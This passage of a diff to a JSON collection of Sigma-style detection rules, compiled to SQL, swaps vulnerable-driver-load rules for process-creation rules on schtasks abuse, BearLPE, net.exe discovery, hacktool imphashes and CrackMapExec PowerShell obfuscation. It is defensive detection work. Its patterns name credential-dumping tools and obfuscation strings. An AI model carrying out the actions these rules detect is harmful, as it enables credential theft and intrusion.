'%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Net.exe Execution", + "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_net_susp_execution.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" - ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR 